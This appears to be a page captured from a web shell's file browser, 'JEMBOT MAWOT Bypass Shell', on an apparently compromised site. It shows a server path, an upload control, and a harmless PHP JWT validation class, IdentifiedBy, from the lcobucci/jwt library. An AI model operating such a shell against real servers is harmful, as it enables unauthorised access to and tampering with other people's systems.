JEMBOT MAWOT Bypass Shell

Current Path : /home/cinepatreb/billetterie/vendor/lcobucci/jwt/src/Validation/Constraint/
Upload File :
Current File : /home/cinepatreb/billetterie/vendor/lcobucci/jwt/src/Validation/Constraint/IdentifiedBy.php

<?php

namespace Lcobucci\JWT\Validation\Constraint;

use Lcobucci\JWT\Token;
use Lcobucci\JWT\Validation\Constraint;
use Lcobucci\JWT\Validation\ConstraintViolation;

final class IdentifiedBy implements Constraint
{
    /** @var string */
    private $id;

    /** @param string $id */
    public function __construct($id)
    {
        $this->id = $id;
    }

    public function assert(Token $token)
    {
        if (! $token->isIdentifiedBy($this->id)) {
            throw new ConstraintViolation(
                'The token is not identified with the expected ID'
            );
        }
    }
}

xxxxx1.0, XXX xxxx